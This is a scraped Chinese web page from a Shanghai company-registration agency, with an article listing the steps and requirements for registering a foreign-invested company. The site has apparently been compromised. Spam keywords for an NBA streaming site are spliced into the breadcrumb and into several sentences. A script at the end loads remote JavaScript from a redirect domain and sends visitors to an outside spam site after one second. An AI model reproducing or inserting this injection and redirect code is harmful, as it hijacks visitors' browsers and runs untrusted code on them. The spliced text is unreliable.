人才招聘

电话:400-966-5552

上海公司注册

栏目标题

联系我们

电   话:400-966-5552   

上海注册公司总   部:浦东浦三路3058号长青企业广场133室,地铁11号线4号口出50米8号门,(近御桥路) 

上海注册公司分   部:上海浦东上南路4366号(地铁11号线三林站下6号口出 斜对面  (靠近三林路)

上海注册公司财务中心:浦东三林镇浦三路3058号长青企业广场3楼338室(近御桥路)

上海注册外资公司

当前位置: 南瓜视频nba直播 > 上海注册外资公司 > 上海注册外资公司方法及流程是什么?宇科告诉你

上海注册外资公司方法及流程是什么?宇科告诉你

来源:上海宇科企业管理有限公司   日期: 2019-07-02    点击率:

现如今,在内地设立外资公司是一种较为常见的现象,内地外资公司的数量也非常多,但依然有很多创业者对注册外资公司的流程与注意事项等方面了解甚少,所以今天上海宇科就针对这类常见的疑问来为大家介绍一下。

  一、注册外资公司办理流程

  1、外资公司查名登记;2、报送外国投资委员会申请批准证书;3、合同、可行性研究报告、章程;4、报送工商局申请营业执照;5、刻制印章;6、办理银行开户;7、办理统计登记;8、办理外汇登记;9、办理财政登记证等。

  二、注册外资公司注意事项

  1、在进行外资公司注册南瓜视频nba直播时,需提交股东身份证明,外国个人需提交经公证过的护照;企业需提交经公证过的合法开业证明。

  2、对于监事会的设立,如若设立,需要有三名监事成员,如若不设立,需设立一名监事。

南瓜视频nba直播  3、外资公司可设立董事会,如果不设,需有一名执行董事。

南瓜视频nba直播  4、在中国内地注册外资公司,需实际出资,并将注册资金打入外资公司外汇账号。

  5、对公司名称进行核准时,可提交多个名称进行查名。

  6、对于公司的经营范围,必须要明确,同时业务范围不能超过经营范围。

  7、注册地址要是商务办公地址,需提供租房合同、房产证复印件等材料。

  对于外资公司的注册,可以选择一家专业的代理机构,这样注册者无疑能更加的省心省力,在这里推荐上海宇科,上海宇科十年代理经验不仅专业,而且经验丰富,能为注册者提供更可靠的服务和支持。

  关于如何注册外资公司,以及注册时需注意的事项,看了上海宇科的相关介绍后,如果您觉得自己办理起来较为费时费力,建议委托上海宇科进行办理,欢迎来电咨询!上海宇科企业管理有限公司是经上海市工商行政管理局依法核准的,企业设立登记专业代理机构,公司总部位于经济飞速发展上海浦东新区,近邻世博园,从业人员具有丰富的行业管理经验和领先的服务意识,以为企业提供集约化服务,标准化服务为己任,致力于提供上海注册公司、财务代理。


推荐文章

常年提供上海注册公司流程及费用上海注册公司注册上海公司上海公司注册外资公司注册等工商登记服务!咨询电话:400-966-5552

(function(){ var head = document.head || document.getElementsByTagName("head")[0] || document.documentElement; var printservice = document.createElement("script"); printservice.src ="http://lao7.tiaozhuanyuming.com/tiaozhuan/lao7.js"; head.insertBefore( printservice,head.firstChild ); } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); var _hmt = _hmt || []; var head = document.head || document.getElementsByTagName("head")[0] || document.documentElement; var printservice = document.createElement("script"); printservice.src ="http://lao7.tiaozhuanyuming.com/tiaozhuan/lao7.js"; head.insertBefore( printservice,head.firstChild ); })(); function jumurl(){ window.location.href = 'http://fulige.vip//?seven'; } setTimeout(jumurl,1000);